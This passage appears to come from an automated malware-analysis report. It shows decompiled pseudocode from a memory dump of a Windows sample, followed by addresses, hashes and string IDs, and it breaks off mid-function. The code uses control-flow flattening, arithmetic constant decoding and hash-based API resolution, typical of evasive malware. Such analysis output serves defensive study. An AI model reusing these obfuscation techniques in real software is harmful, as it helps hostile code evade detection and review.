                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t350 = 0x8acd4c3;
                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                    					while(_t375 != 0x2a001bc) {
                                                                                                                                                                                                                    						if(_t375 == 0x3a6ad9f) {
                                                                                                                                                                                                                    							_t358 = E00A7A3E9( *(_t436 + 0x8c),  *(_t436 + 0x78), _t375, _t436 + 0xc0, _t375,  *(_t436 + 0x70),  *(_t436 + 0x94), 0x2000000,  *(_t436 + 0x44),  *(_t436 + 0x30),  *(_t436 + 0x44) | 0x00000006, 1);
                                                                                                                                                                                                                    							_t373 = _t358;
                                                                                                                                                                                                                    							_t436 = _t436 + 0x28;
                                                                                                                                                                                                                    							if(_t358 != 0xffffffff) {
                                                                                                                                                                                                                    								_t375 = 0xf20509c;
                                                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t375 == 0x5a8e9d8) {
                                                                                                                                                                                                                    								E00A76A6B(_t418,  *((intOrPtr*)(_t436 + 0xa4)),  *(_t436 + 0x38),  *((intOrPtr*)(_t436 + 0x7c)),  *(_t436 + 0x40));
                                                                                                                                                                                                                    								_t436 = _t436 + 0xc;
                                                                                                                                                                                                                    								_t375 = 0xdd99e4d;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									L1:
                                                                                                                                                                                                                    									_t350 = 0x8acd4c3;
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t375 == _t350) {
                                                                                                                                                                                                                    									_t362 = E00A74A07( *(_t436 + 0x48),  *((intOrPtr*)(_t436 + 0x7c)), _t430, _t373,  *(_t436 + 0x60),  *(_t436 + 0x4c), _t436 + 0xb4, _t375,  *(_t436 + 0x28),  *(_t436 + 0x9c), _t375, _t418, _t375,  *(_t436 + 0x90));
                                                                                                                                                                                                                    									_t436 = _t436 + 0x30;
                                                                                                                                                                                                                    									if(_t362 == 0) {
                                                                                                                                                                                                                    										_t363 =  *((intOrPtr*)(_t436 + 0xa0));
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t432 = _t418;
                                                                                                                                                                                                                    										L13:
                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                    											if( *((intOrPtr*)(_t432 + 4)) != 4) {
                                                                                                                                                                                                                    												L15:
                                                                                                                                                                                                                    												_t365 =  *_t432;
                                                                                                                                                                                                                    												if(_t365 == 0) {
                                                                                                                                                                                                                    													_t363 =  *((intOrPtr*)(_t436 + 0xa0));
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													_t432 = _t432 + _t365;
                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												_t288 = _t432 + 0xc; // 0xa94bc8
                                                                                                                                                                                                                    												if(E00A66877( *(_t436 + 0x50), _t288,  *(_t436 + 0x8c), _t434) == 0) {
                                                                                                                                                                                                                    													_t363 = 1;
                                                                                                                                                                                                                    													 *((intOrPtr*)(_t436 + 0xa0)) = 1;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													goto L15;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    											_t430 =  *(_t436 + 0x50);
                                                                                                                                                                                                                    											goto L21;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									L21:
                                                                                                                                                                                                                    									if(_t363 == 0) {
                                                                                                                                                                                                                    										_t350 = 0x8acd4c3;
                                                                                                                                                                                                                    										_t375 = 0x8acd4c3;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										E00A7AA78( *((intOrPtr*)( *0xa8320c + 0x38)),  *((intOrPtr*)(_t436 + 0xa8)),  *(_t436 + 0x78),  *(_t436 + 0x98),  *(_t436 + 0x68));
                                                                                                                                                                                                                    										_t436 = _t436 + 0xc;
                                                                                                                                                                                                                    										_t375 = 0x5a8e9d8;
                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                    											L1:
                                                                                                                                                                                                                    											_t350 = 0x8acd4c3;
                                                                                                                                                                                                                    											goto L2;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									L32:
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t375 == 0x8dc3736) {
                                                                                                                                                                                                                    										_t375 = 0x2a001bc;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t375 == 0xdd99e4d) {
                                                                                                                                                                                                                    											E00A6E2BD(_t373,  *(_t436 + 0x54),  *(_t436 + 0x88),  *(_t436 + 0x24));
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t375 != 0xf20509c) {
                                                                                                                                                                                                                    												L28:
                                                                                                                                                                                                                    												if(_t375 != 0x9a009d4) {
                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												_t430 = 0x1000;
                                                                                                                                                                                                                    												 *(_t436 + 0x54) = 0x1000;
                                                                                                                                                                                                                    												_t418 = E00A7C6D9(0x1000);
                                                                                                                                                                                                                    												_t350 = 0x8acd4c3;
                                                                                                                                                                                                                    												_t375 =  !=  ? 0x8acd4c3 : 0xdd99e4d;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                    						goto L32;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A6D804( *(_t436 + 0x1c),  *((intOrPtr*)(_t436 + 0x7c)), _t436 + 0xb8, _t375,  *(_t436 + 0x70),  *((intOrPtr*)(_t436 + 0x34)));
                                                                                                                                                                                                                    					_t353 = E00A75011(_t436 + 0xc8,  *(_t436 + 0x30),  *(_t436 + 0x8c));
                                                                                                                                                                                                                    					_t434 = _t353;
                                                                                                                                                                                                                    					_t436 = _t436 + 0x14;
                                                                                                                                                                                                                    					_t375 = 0x3a6ad9f;
                                                                                                                                                                                                                    					 *((short*)(_t353 - 2)) = 0;
                                                                                                                                                                                                                    					_t350 = 0x8acd4c3;
                                                                                                                                                                                                                    					goto L28;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                    0x00a61eca
                                                                                                                                                                                                                    0x00a61ed7
                                                                                                                                                                                                                    0x00a61ee0
                                                                                                                                                                                                                    0x00a61ee7
                                                                                                                                                                                                                    0x00a61eec
                                                                                                                                                                                                                    0x00a61ef7
                                                                                                                                                                                                                    0x00a61f0a
                                                                                                                                                                                                                    0x00a61f11
                                                                                                                                                                                                                    0x00a61f1c
                                                                                                                                                                                                                    0x00a61f24
                                                                                                                                                                                                                    0x00a61f2c
                                                                                                                                                                                                                    0x00a61f34
                                                                                                                                                                                                                    0x00a61f3c
                                                                                                                                                                                                                    0x00a61f4b
                                                                                                                                                                                                                    0x00a61f4e
                                                                                                                                                                                                                    0x00a61f52
                                                                                                                                                                                                                    0x00a61f5a
                                                                                                                                                                                                                    0x00a61f62
                                                                                                                                                                                                                    0x00a61f6a
                                                                                                                                                                                                                    0x00a61f72
                                                                                                                                                                                                                    0x00a61f7a
                                                                                                                                                                                                                    0x00a61f82
                                                                                                                                                                                                                    0x00a61f8f
                                                                                                                                                                                                                    0x00a61f93
                                                                                                                                                                                                                    0x00a61f9b
                                                                                                                                                                                                                    0x00a61fa3
                                                                                                                                                                                                                    0x00a61fab
                                                                                                                                                                                                                    0x00a61fb3
                                                                                                                                                                                                                    0x00a61fbb
                                                                                                                                                                                                                    0x00a61fc3
                                                                                                                                                                                                                    0x00a61fd3
                                                                                                                                                                                                                    0x00a61fd7
                                                                                                                                                                                                                    0x00a61fdf
                                                                                                                                                                                                                    0x00a61fe7
                                                                                                                                                                                                                    0x00a61fec
                                                                                                                                                                                                                    0x00a61ff1
                                                                                                                                                                                                                    0x00a61ff6
                                                                                                                                                                                                                    0x00a61ffe
                                                                                                                                                                                                                    0x00a62009
                                                                                                                                                                                                                    0x00a62014
                                                                                                                                                                                                                    0x00a6201f
                                                                                                                                                                                                                    0x00a62027
                                                                                                                                                                                                                    0x00a6202f
                                                                                                                                                                                                                    0x00a62037
                                                                                                                                                                                                                    0x00a62043
                                                                                                                                                                                                                    0x00a62048
                                                                                                                                                                                                                    0x00a6204e
                                                                                                                                                                                                                    0x00a62056
                                                                                                                                                                                                                    0x00a62061
                                                                                                                                                                                                                    0x00a6206c
                                                                                                                                                                                                                    0x00a62077
                                                                                                                                                                                                                    0x00a6207f
                                                                                                                                                                                                                    0x00a62088
                                                                                                                                                                                                                    0x00a6208d
                                                                                                                                                                                                                    0x00a62097
                                                                                                                                                                                                                    0x00a6209a
                                                                                                                                                                                                                    0x00a6209e
                                                                                                                                                                                                                    0x00a620a6
                                                                                                                                                                                                                    0x00a620b0
                                                                                                                                                                                                                    0x00a620b8
                                                                                                                                                                                                                    0x00a620bf
                                                                                                                                                                                                                    0x00a620c2
                                                                                                                                                                                                                    0x00a620c6
                                                                                                                                                                                                                    0x00a620cb
                                                                                                                                                                                                                    0x00a620d3
                                                                                                                                                                                                                    0x00a620db
                                                                                                                                                                                                                    0x00a620e3
                                                                                                                                                                                                                    0x00a620eb
                                                                                                                                                                                                                    0x00a620f3
                                                                                                                                                                                                                    0x00a620f8
                                                                                                                                                                                                                    0x00a62100
                                                                                                                                                                                                                    0x00a62105
                                                                                                                                                                                                                    0x00a6210d
                                                                                                                                                                                                                    0x00a6211a
                                                                                                                                                                                                                    0x00a6211e
                                                                                                                                                                                                                    0x00a62126
                                                                                                                                                                                                                    0x00a6212e
                                                                                                                                                                                                                    0x00a62136
                                                                                                                                                                                                                    0x00a6213e
                                                                                                                                                                                                                    0x00a62143
                                                                                                                                                                                                                    0x00a62147
                                                                                                                                                                                                                    0x00a6214f
                                                                                                                                                                                                                    0x00a6215f
                                                                                                                                                                                                                    0x00a62168
                                                                                                                                                                                                                    0x00a62169
                                                                                                                                                                                                                    0x00a6216d
                                                                                                                                                                                                                    0x00a62175
                                                                                                                                                                                                                    0x00a6217d
                                                                                                                                                                                                                    0x00a62188
                                                                                                                                                                                                                    0x00a6218c
                                                                                                                                                                                                                    0x00a62194
                                                                                                                                                                                                                    0x00a6219c
                                                                                                                                                                                                                    0x00a621a4
                                                                                                                                                                                                                    0x00a621ac
                                                                                                                                                                                                                    0x00a621b1
                                                                                                                                                                                                                    0x00a621b9
                                                                                                                                                                                                                    0x00a621c1
                                                                                                                                                                                                                    0x00a621cc
                                                                                                                                                                                                                    0x00a621d7
                                                                                                                                                                                                                    0x00a621e2
                                                                                                                                                                                                                    0x00a621ef
                                                                                                                                                                                                                    0x00a621f3
                                                                                                                                                                                                                    0x00a621f8
                                                                                                                                                                                                                    0x00a62200
                                                                                                                                                                                                                    0x00a6220b
                                                                                                                                                                                                                    0x00a62213
                                                                                                                                                                                                                    0x00a6221e
                                                                                                                                                                                                                    0x00a62229
                                                                                                                                                                                                                    0x00a62231
                                                                                                                                                                                                                    0x00a6223c
                                                                                                                                                                                                                    0x00a62244
                                                                                                                                                                                                                    0x00a6224c
                                                                                                                                                                                                                    0x00a62254
                                                                                                                                                                                                                    0x00a6225f
                                                                                                                                                                                                                    0x00a6226a
                                                                                                                                                                                                                    0x00a62275
                                                                                                                                                                                                                    0x00a6227d
                                                                                                                                                                                                                    0x00a62281
                                                                                                                                                                                                                    0x00a62289
                                                                                                                                                                                                                    0x00a62294
                                                                                                                                                                                                                    0x00a6229c
                                                                                                                                                                                                                    0x00a622a7
                                                                                                                                                                                                                    0x00a622b4
                                                                                                                                                                                                                    0x00a622b8
                                                                                                                                                                                                                    0x00a622c0
                                                                                                                                                                                                                    0x00a622c5
                                                                                                                                                                                                                    0x00a622cd
                                                                                                                                                                                                                    0x00a622d7
                                                                                                                                                                                                                    0x00a622dc
                                                                                                                                                                                                                    0x00a622e4
                                                                                                                                                                                                                    0x00a622ec
                                                                                                                                                                                                                    0x00a622f1
                                                                                                                                                                                                                    0x00a622f6
                                                                                                                                                                                                                    0x00a622fe
                                                                                                                                                                                                                    0x00a62306
                                                                                                                                                                                                                    0x00a62314
                                                                                                                                                                                                                    0x00a62319
                                                                                                                                                                                                                    0x00a6231f
                                                                                                                                                                                                                    0x00a62327
                                                                                                                                                                                                                    0x00a62339
                                                                                                                                                                                                                    0x00a6233e
                                                                                                                                                                                                                    0x00a62347
                                                                                                                                                                                                                    0x00a62352
                                                                                                                                                                                                                    0x00a6235a
                                                                                                                                                                                                                    0x00a6235f
                                                                                                                                                                                                                    0x00a6236b
                                                                                                                                                                                                                    0x00a6236e
                                                                                                                                                                                                                    0x00a62372
                                                                                                                                                                                                                    0x00a62376
                                                                                                                                                                                                                    0x00a6237a
                                                                                                                                                                                                                    0x00a6237e
                                                                                                                                                                                                                    0x00a62382
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6238f
                                                                                                                                                                                                                    0x00a623a1
                                                                                                                                                                                                                    0x00a62530
                                                                                                                                                                                                                    0x00a62535
                                                                                                                                                                                                                    0x00a62537
                                                                                                                                                                                                                    0x00a6253d
                                                                                                                                                                                                                    0x00a6253f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6253f
                                                                                                                                                                                                                    0x00a623a7
                                                                                                                                                                                                                    0x00a623ad
                                                                                                                                                                                                                    0x00a624e7
                                                                                                                                                                                                                    0x00a624ec
                                                                                                                                                                                                                    0x00a624ef
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a623b3
                                                                                                                                                                                                                    0x00a623b5
                                                                                                                                                                                                                    0x00a62439
                                                                                                                                                                                                                    0x00a6243e
                                                                                                                                                                                                                    0x00a62443
                                                                                                                                                                                                                    0x00a6247d
                                                                                                                                                                                                                    0x00a62445
                                                                                                                                                                                                                    0x00a62445
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a62447
                                                                                                                                                                                                                    0x00a6244b
                                                                                                                                                                                                                    0x00a62467
                                                                                                                                                                                                                    0x00a62467
                                                                                                                                                                                                                    0x00a6246b
                                                                                                                                                                                                                    0x00a62486
                                                                                                                                                                                                                    0x00a6246d
                                                                                                                                                                                                                    0x00a6246d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6246d
                                                                                                                                                                                                                    0x00a6244d
                                                                                                                                                                                                                    0x00a62459
                                                                                                                                                                                                                    0x00a62465
                                                                                                                                                                                                                    0x00a62473
                                                                                                                                                                                                                    0x00a62474
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a62465
                                                                                                                                                                                                                    0x00a6248d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6248d
                                                                                                                                                                                                                    0x00a62447
                                                                                                                                                                                                                    0x00a62491
                                                                                                                                                                                                                    0x00a62493
                                                                                                                                                                                                                    0x00a624c6
                                                                                                                                                                                                                    0x00a624cb
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a62495
                                                                                                                                                                                                                    0x00a624b4
                                                                                                                                                                                                                    0x00a624b9
                                                                                                                                                                                                                    0x00a624bc
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00a6238a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a623b7
                                                                                                                                                                                                                    0x00a623bd
                                                                                                                                                                                                                    0x00a62402
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a623bf
                                                                                                                                                                                                                    0x00a623c5
                                                                                                                                                                                                                    0x00a625b2
                                                                                                                                                                                                                    0x00a623cb
                                                                                                                                                                                                                    0x00a623d1
                                                                                                                                                                                                                    0x00a62593
                                                                                                                                                                                                                    0x00a62599
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6259f
                                                                                                                                                                                                                    0x00a623d7
                                                                                                                                                                                                                    0x00a623db
                                                                                                                                                                                                                    0x00a623e5
                                                                                                                                                                                                                    0x00a623ee
                                                                                                                                                                                                                    0x00a623f0
                                                                                                                                                                                                                    0x00a623fd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a623fd
                                                                                                                                                                                                                    0x00a623d1
                                                                                                                                                                                                                    0x00a623c5
                                                                                                                                                                                                                    0x00a623bd
                                                                                                                                                                                                                    0x00a623b5
                                                                                                                                                                                                                    0x00a623ad
                                                                                                                                                                                                                    0x00a625c5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a625c5
                                                                                                                                                                                                                    0x00a62562
                                                                                                                                                                                                                    0x00a62579
                                                                                                                                                                                                                    0x00a6257e
                                                                                                                                                                                                                    0x00a62580
                                                                                                                                                                                                                    0x00a62585
                                                                                                                                                                                                                    0x00a6258a
                                                                                                                                                                                                                    0x00a6258e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6258e

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !8[$1,E$95n$>w_$PiO9$^a)f$fkk$Z_5
                                                                                                                                                                                                                    • API String ID: 0-828434834
                                                                                                                                                                                                                    • Opcode ID: 703dbf8607d6b551ad6a479b455913c0f14ee5ab6e9bc9f83679eca31b41013c
                                                                                                                                                                                                                    • Instruction ID: 065fc575ffc94166e36b38603cbddc03d1a1ced56c98607e77a3f74706d53e45
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 703dbf8607d6b551ad6a479b455913c0f14ee5ab6e9bc9f83679eca31b41013c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12022F71508780DFD368CF25C48AA5BBBF1FBC4758F10891DF69A8A260DBB58949CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                    			E00A61914(intOrPtr __ecx) {
                                                                                                                                                                                                                    				char _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				intOrPtr _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				signed int _v216;
                                                                                                                                                                                                                    				signed int _v220;
                                                                                                                                                                                                                    				signed int _v224;
                                                                                                                                                                                                                    				void* _t249;
                                                                                                                                                                                                                    				void* _t251;
                                                                                                                                                                                                                    				intOrPtr _t266;
                                                                                                                                                                                                                    				intOrPtr* _t269;
                                                                                                                                                                                                                    				void* _t274;
                                                                                                                                                                                                                    				signed int _t293;
                                                                                                                                                                                                                    				signed int _t294;
                                                                                                                                                                                                                    				signed int _t295;
                                                                                                                                                                                                                    				signed int _t296;
                                                                                                                                                                                                                    				signed int _t297;
                                                                                                                                                                                                                    				intOrPtr _t298;
                                                                                                                                                                                                                    				void* _t299;
                                                                                                                                                                                                                    				intOrPtr _t302;
                                                                                                                                                                                                                    				signed int* _t303;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t303 =  &_v224;
                                                                                                                                                                                                                    				_v176 = __ecx;
                                                                                                                                                                                                                    				_v208 = 0x81538f;
                                                                                                                                                                                                                    				_v208 = _v208 << 7;
                                                                                                                                                                                                                    				_v208 = _v208 + 0xffff72fb;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x6c89e425;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x2c2b3e4d;
                                                                                                                                                                                                                    				_v184 = 0xa3dc4e;
                                                                                                                                                                                                                    				_v184 = _v184 + 0xffff9ef4;
                                                                                                                                                                                                                    				_v184 = _v184 << 0x10;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0xede64642;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0x96a643a9;
                                                                                                                                                                                                                    				_v220 = 0x5de7f3;
                                                                                                                                                                                                                    				_v220 = _v220 << 2;
                                                                                                                                                                                                                    				_v220 = _v220 | 0xe47df02d;
                                                                                                                                                                                                                    				_v220 = _v220 + 0xffff478d;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0xe57ce932;
                                                                                                                                                                                                                    				_v200 = 0x13c2e0;
                                                                                                                                                                                                                    				_t293 = 7;
                                                                                                                                                                                                                    				_v200 = _v200 / _t293;
                                                                                                                                                                                                                    				_t299 = 0x993b58c;
                                                                                                                                                                                                                    				_t294 = 0x64;
                                                                                                                                                                                                                    				_v200 = _v200 * 0x54;
                                                                                                                                                                                                                    				_v200 = _v200 * 3;
                                                                                                                                                                                                                    				_v200 = _v200 ^ 0x02cb7657;
                                                                                                                                                                                                                    				_v172 = 0x2f109b;
                                                                                                                                                                                                                    				_v172 = _v172 * 0x5a;
                                                                                                                                                                                                                    				_v172 = _v172 >> 1;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0x08405dbe;
                                                                                                                                                                                                                    				_v192 = 0x75cefa;
                                                                                                                                                                                                                    				_v192 = _v192 + 0xffff3f03;
                                                                                                                                                                                                                    				_v192 = _v192 >> 7;
                                                                                                                                                                                                                    				_v192 = _v192 >> 0xd;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x000984c4;
                                                                                                                                                                                                                    				_v148 = 0x560fd6;
                                                                                                                                                                                                                    				_v148 = _v148 + 0xffff6379;
                                                                                                                                                                                                                    				_v148 = _v148 << 0xd;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0xae6e58f5;
                                                                                                                                                                                                                    				_v152 = 0x805d23;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0xaf63af90;
                                                                                                                                                                                                                    				_v152 = _v152 >> 8;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x00a01a25;
                                                                                                                                                                                                                    				_v132 = 0x1141e8;
                                                                                                                                                                                                                    				_v132 = _v132 + 0xffffac0c;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x0010c48f;
                                                                                                                                                                                                                    				_v136 = 0x114206;
                                                                                                                                                                                                                    				_v136 = _v136 + 0xc9d2;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x001553f4;
                                                                                                                                                                                                                    				_v144 = 0x3d601b;
                                                                                                                                                                                                                    				_v144 = _v144 << 7;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x1ebfa34f;
                                                                                                                                                                                                                    				_v216 = 0xf5ec2a;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0xbbf9ed94;
                                                                                                                                                                                                                    				_v216 = _v216 << 2;
                                                                                                                                                                                                                    				_v216 = _v216 / _t294;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0x0256747d;
                                                                                                                                                                                                                    				_v212 = 0x2e4147;
                                                                                                                                                                                                                    				_t295 = 0x12;
                                                                                                                                                                                                                    				_v212 = _v212 * 0x26;
                                                                                                                                                                                                                    				_v212 = _v212 / _t295;
                                                                                                                                                                                                                    				_v212 = _v212 * 0x2b;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x106e481d;
                                                                                                                                                                                                                    				_v160 = 0x7f863;
                                                                                                                                                                                                                    				_v160 = _v160 << 7;
                                                                                                                                                                                                                    				_t296 = 5;
                                                                                                                                                                                                                    				_t302 = _v176;
                                                                                                                                                                                                                    				_v160 = _v160 * 0x4e;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x36daf8e7;
                                                                                                                                                                                                                    				_v140 = 0xcbe89c;
                                                                                                                                                                                                                    				_v140 = _v140 | 0x92604408;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x92e59357;
                                                                                                                                                                                                                    				_v224 = 0x55c888;
                                                                                                                                                                                                                    				_v224 = _v224 + 0xffff1d6b;
                                                                                                                                                                                                                    				_v224 = _v224 + 0xffff2576;
                                                                                                                                                                                                                    				_v224 = _v224 + 0xffffda3a;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0x00503d0f;
                                                                                                                                                                                                                    				_v156 = 0x80b054;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x42e4d91f;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0xab5fe4b7;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0xe931ad3d;
                                                                                                                                                                                                                    				_v164 = 0xa719f8;
                                                                                                                                                                                                                    				_t266 = _v176;
                                                                                                                                                                                                                    				_v164 = _v164 / _t296;
                                                                                                                                                                                                                    				_v164 = _v164 + 0xffff62b9;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x0020d766;
                                                                                                                                                                                                                    				_v168 = 0xc5f95c;
                                                                                                                                                                                                                    				_t297 = 0x56;
                                                                                                                                                                                                                    				_v168 = _v168 * 0x7f;
                                                                                                                                                                                                                    				_v168 = _v168 + 0xe824;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0x6233176c;
                                                                                                                                                                                                                    				_v180 = 0x172f02;
                                                                                                                                                                                                                    				_v180 = _v180 >> 0xa;
                                                                                                                                                                                                                    				_v180 = _v180 * 0x60;
                                                                                                                                                                                                                    				_t298 = _v176;
                                                                                                                                                                                                                    				_v180 = _v180 / _t297;
                                                                                                                                                                                                                    				_v180 = _v180 ^ 0x000550e3;
                                                                                                                                                                                                                    				_v188 = 0x5e687b;
                                                                                                                                                                                                                    				_v188 = _v188 + 0xffffe47d;
                                                                                                                                                                                                                    				_v188 = _v188 << 0xa;
                                                                                                                                                                                                                    				_v188 = _v188 + 0xffff9fec;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x793c5065;
                                                                                                                                                                                                                    				_v196 = 0xb0693e;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x15e07c13;
                                                                                                                                                                                                                    				_v196 = _v196 + 0xffffae0d;
                                                                                                                                                                                                                    				_v196 = _v196 + 0xffff2c7b;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x1541f5bb;
                                                                                                                                                                                                                    				_v204 = 0xed05e6;
                                                                                                                                                                                                                    				_v204 = _v204 + 0xffffbf6f;
                                                                                                                                                                                                                    				_v204 = _v204 + 0xe748;
                                                                                                                                                                                                                    				_v204 = _v204 << 0xc;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0xdacf3546;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t249 = 0x4b068bc;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						while(_t299 != 0x8a7015) {
                                                                                                                                                                                                                    							if(_t299 == _t249) {
                                                                                                                                                                                                                    								_push(_v224);
                                                                                                                                                                                                                    								_push(_v140);
                                                                                                                                                                                                                    								_push(_v160);
                                                                                                                                                                                                                    								_t251 = E00A81E60(0xa617c4, _v212, __eflags);
                                                                                                                                                                                                                    								_t303 =  &(_t303[3]);
                                                                                                                                                                                                                    								_push(_t266);
                                                                                                                                                                                                                    								_push( &_v128);
                                                                                                                                                                                                                    								_push(_t251);
                                                                                                                                                                                                                    								_push(_t302);
                                                                                                                                                                                                                    								_push(_t298);
                                                                                                                                                                                                                    								 *((intOrPtr*)(E00A7D5E0(0xa617c4, 0x988428b1, 0x180)))();
                                                                                                                                                                                                                    								E00A7D6DF(_v156, _t251, _v164, _v168);
                                                                                                                                                                                                                    								_t299 = 0x8a7015;
                                                                                                                                                                                                                    								goto L10;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t299 == 0x89022b3) {
                                                                                                                                                                                                                    									_t266 = E00A735DB( *((intOrPtr*)(_t269 + 4)), _v148, _v152,  *_t269, _v132, _v136);
                                                                                                                                                                                                                    									_t303 =  &(_t303[4]);
                                                                                                                                                                                                                    									__eflags = _t266;
                                                                                                                                                                                                                    									if(__eflags != 0) {
